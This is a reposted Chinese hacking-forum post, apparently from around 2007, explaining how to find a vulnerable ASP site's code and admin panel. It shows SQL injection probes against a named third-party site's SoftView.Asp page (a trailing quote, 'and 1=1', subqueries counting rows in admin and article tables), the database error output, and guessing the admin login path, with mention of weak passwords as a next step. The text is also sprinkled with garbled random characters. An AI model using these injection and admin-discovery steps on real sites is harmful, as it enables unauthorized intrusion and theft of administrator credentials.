- 在线时间
- 0 小时
- 最后登录
- 2007-9-23
- 注册时间
- 2004-9-10
- 听众数
- 3
- 收听数
- 0
- 能力
- 0 分
- 体力
- 9975 点
- 威望
- 7 点
- 阅读权限
- 150
- 积分
- 4048
- 相册
- 0
- 日志
- 0
- 记录
- 0
- 帖子
- 1893
- 主题
- 823
- 精华
- 2
- 分享
- 0
- 好友
- 0

我的地盘我做主
该用户从未签到
 |
作者:枫三少 转自:黑基bbs原创作品版
8 m' N0 }9 Z7 }: u
: e( {6 E# K) N: A, z有很多人问过我这个问题。老是听说,看到文章里谁谁谁怎么分析别人的代码怎么来入侵的。那么怎么找代码呢?
! s o6 b5 F2 P/ {& }
, J/ K* u$ o/ A/ H分析代码,首先你得有源代码。如果找源代码呢?呵呵,假如是分析DV的,就下一个DV的来,看看他的代码。6 ], J* i+ j/ {7 q/ |! l' @
) d- A2 E* @ m {* Z# n在实战中往往因为时间的愿意我们采用的还有从HTML代码入手。
5 H$ y! I, g8 f0 m& w
& u- S; T7 ^3 @2 H" y这里我简单的介绍一个过程吧。7 Q4 X( S% c$ G
& R) _ b6 P) m( W; M
首先我找到一个网站,是我们基地首页有连接的
2 s7 l9 J1 l1 D; L& ]2 v9 _4 rhttp://www.16china.com/hack/6 o3 |( b! h5 W6 j" b$ T
2 F2 v. C8 e( S* ?3 x9 ^
随便选择一个分页:
~ P4 |0 M; U" Ghttp://www.16china.com/hack/SoftView.Asp?SoftID=139' c# N& Y2 b; E4 F& A3 ]2 X
典型的ASP。看看能不能注射1 z% I: _5 e8 p5 x! D
http://www.16china.com/hack/SoftView.Asp?SoftID=139'
7 K) b% w! I" }2 ]& b返回:; ~3 y8 ]! W7 E; r; X' i: V
Microsoft VBScript 编译器错误 错误 '800a03f6'
: e/ ^; j Q7 b. z% T6 H- P2 X
, u$ d H, f5 V缺少 'End' 9 ~/ {% {# y' e6 j
" z) r) ^, w5 z- I. s/iisHelp/common/500-100.asp,行242 / O& m1 R$ X/ g7 U8 G" C9 j1 o
2 t. E3 j; u+ Z% T; y. z5 p+ u! ?4 O0 Y
Microsoft JET Database Engine 错误 '80040e14'
( L; J+ ^# r! L) k' G0 l% _0 P% M% @/ L$ N X7 s
字符串的语法错误 在查询表达式 'SoftInfo.CateID=Category.CateID and SoftInfo.SubID=SubCate.SubID and SoftInfo.SoftID=139'' 中。 % x6 w) L4 R5 v. q4 {' Y# l
2 b6 j! a& O o
/hack/SoftView.Asp,行17
; e; x/ L0 R& X3 t4 f, ?- c再来:
) M) b& A" f3 e2 z& d3 ]. ohttp://www.16china.com/hack/SoftView.Asp?SoftID=139%20and%201=1& D; Y: I! G' c: S3 p
返回正常网页。4 `) x8 {( O1 \& F r4 ~3 ?
+ c% _9 r$ B/ w- c* o( y* d
提交:1 Q, B+ `; J3 L& j1 h. n+ o
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20admin)>=08 ]; M! \! f- W' T c
& {1 [2 A% A2 ^- y9 u ~9 C
返回正常页/* n& O# J4 ?3 m$ b5 c% J0 G* X. t
http://www.16china.com/hack/Soft ... %20(select%20count(*)%20from%20article)>=0. P2 h$ P0 u. S$ }* ?
9 @. p) a% Q2 P$ w+ O f同样正常。: m, w5 y5 K) ^. J a
& Z* K& a* j7 o0 \$ d- x8 Whttp://www.16china.com/hack/Soft ... )%20from%20article)>=0
) E/ u, U% z! |( h3 H
( V6 [% Z9 J' K; ~( {' q! L% e……- X/ M2 T) v. X6 R
5 {# S$ P' b- p, b$ u/ u. {象上面这样我们就可以成功注射网站。那么在拿到管理员帐号密码后如何找后台- q* [3 s8 S; f4 ^, G4 D# l
按以往的经验我采用:
/ a) m- V {6 ?http://www.16china.com/hack/admin /*这里的”ADMIN“可以用LOGIN等替换*/! A8 X% x' b7 V3 H4 v7 M
我为什么不用http://www.16china.com/hack/admin.asp! D6 p( M2 W l/ f7 ^
http://www.16china.com/hack/admin/index.asp呢?因为我不知道他文件夹里的东西有没有被修改。如果存在ADMIN文件夹,但是并不是常用首页的话IE将返回如“你没有权限浏览网页……”等信息,一般来说我们可以确定后台就在那里。
- g! M1 Z$ ?: k5 P! Ehttp://www.16china.com/hack/admin返回信息:- u5 ?: Q- h# e6 }# G
错误提示信息! 0 ?7 i, k# Q. b4 F5 {
产生错误的可能原因:
1 q0 A u9 l, ~: p1 M
" d$ E- d+ K/ s2 P, b9 _1 L/ D$ G8 P" b. ~* I
您没有进入本页面的权限!本次操作已被记录!
+ w; @5 K( z2 C& t可能您还没有登陆或者不具有使用当前功能的权限!请联系管理员.
8 b% ?* q t. e8 I3 G7 a本页面为[管理员]专用,请先登陆后进入.. \6 l9 D8 S* v' j
9 l5 n0 \: s9 J6 R. l b- Z( ]
返回上一页... /*说明登陆URL为常用的如:index.asp...*/
* u n; K# |* C& J& J0 J查看HTML代码:
+ p: f% t" e g! Y# p' l<html><head><title>错误提示信息!</title>
+ j; i# l: a9 F. k3 ~3 D
, A. r; W; L1 b……
+ |- j0 u4 V5 i
- p! Z+ e/ c/ C& N- k4 F0 {<a href=adminlogin.asp class=meun target=_top>登陆</a>后进入.9 v/ O3 Q$ H( b8 B& M* Y/ o& B8 Z
……. F5 i+ `0 @9 x; I' C
2 o* W% m$ I$ Q& T3 d找到了:! Y* R8 u- y5 x1 U' }9 Y+ R
http://www.16china.com/hack/admin/adminlogin.asp) B* @+ Z: g" G0 E+ V, _9 B7 f
1 v: O6 ?8 S4 {* U! l
; @1 R3 i9 D$ h
看看他的源代码告诉我们些什么:) r) m; J; d/ ]+ t/ R
* g: K! ]8 P- J/ }. f1 j0 X: w<html>( F& [+ h! i9 a( M% L' G$ D
/ l; b" Z9 `6 ]$ K, t/ _<head>
1 O- j9 L" A f5 ~* X: ^<title>管理员登陆</title>
5 Z. m; K$ y) M( P- x2 X' m. |1 O
! G+ {. E( q6 x4 m……………4 y$ @0 u9 T" ]# H* k4 w u, z
5 m \2 f& R" y q& q* M3 \6 s$ O
关于数据库表名这些这里不多讲,看看,如果我们输入正确的帐号密码将回进入
1 k% e. V9 ]7 E$ Q( Shttp://www.16china.com/hack/admin/adminlogin.asp?action=login- @( x& \2 u( s! N5 m4 w: r ^
这里。5 F: D& q( F' k) Y" q& Y: \
$ K; e" J$ g% ~+ L! ?$ q
只要知道了后台,我们就有很多办法,如弱口令,SQL本地执行(赢政下载系统)……
" c! [0 g, ~( v& ?/ a# [ j, F5 c; }* g8 D" \" f4 r
懂了吗?好了,时间关系加上本人技术原因就写到这里吧。不懂的可以跟贴,大家一起讨论一下:) |
zan
|